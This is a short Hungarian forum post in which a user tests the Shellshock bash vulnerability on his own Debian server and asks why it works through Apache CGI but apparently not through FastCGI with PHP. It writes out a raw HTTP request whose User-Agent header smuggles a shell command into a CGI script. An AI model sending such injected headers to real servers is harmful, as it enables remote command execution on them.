Legfrissebb anyagok
GAMEPOD.hu témák
PROHARDVER! témák
Mobilarena témák
Új hozzászólás Aktív témák
-
beleszólok
senior tag
Segítsetek! Van egy kifejezetten e célra őrizgetett debian szerverem, rajta a bugos bash.
Első menetben azzal próbálkoztam, hogy apache+cgi. Így, egy cgi szkriptet futtatva, megfelelően preparált környezeti változóval, szépen működik az exploit.
(telnet localhost 80
GET /cgi-bin/x.sh HTTP/1.1
Host: localhost
Useragent: () { :;}; echo 1 >>/tmp/xxszépen létrehozza a www-data nevében a /tmp/xx fájlt.
De... ha ugyanezt nginx/apache2 + fastcgi + php5 trióval próbálnám, akkor már nem bírom rávenni, hogy a /tmp-be írjon.
Én rontok el valamit vagy a fastcgi-s konfigurációkat nem érinti a bug?Tiszavirág: http://youtu.be/YdcsiW0kfso
Új hozzászólás Aktív témák
Témaindító írás
Aktív témák
- GoPro Topic
- Apple Watch Ultra - első nekifutás
- sziku69: Fűzzük össze a szavakat :)
- Milyen CPU léghűtést vegyek?
- Asztrofotózás
- Milyen billentyűzetet vegyek?
- pfSense - Avagy az okosított házirouter
- Revolut
- nVidia tulajok OFF topikja
- Kodi és kiegészítői magyar nyelvű online tartalmakhoz (Linux, Windows)
- További aktív témák...
Új prémium hirdetések
- Xbox Series X
- SAMSUNG 55CU7172 Crystal 4K UHD SMART LED TV+Garancia!
- Megkimélt Apple iPhone 12 Mini 64GB Fekete, kártyafüggetlen
- Ritkaság! DELL PRECISION 5530 Érintőképernyő / 4K IPS / i7-8850H / 16GB DDR4 / NVMe SSD / P1000 4GB
- ÚJ! Macbook Pro 16" - 2023, M3 Pro, 18/512GB, 2 ciklus, Apple garancia (72)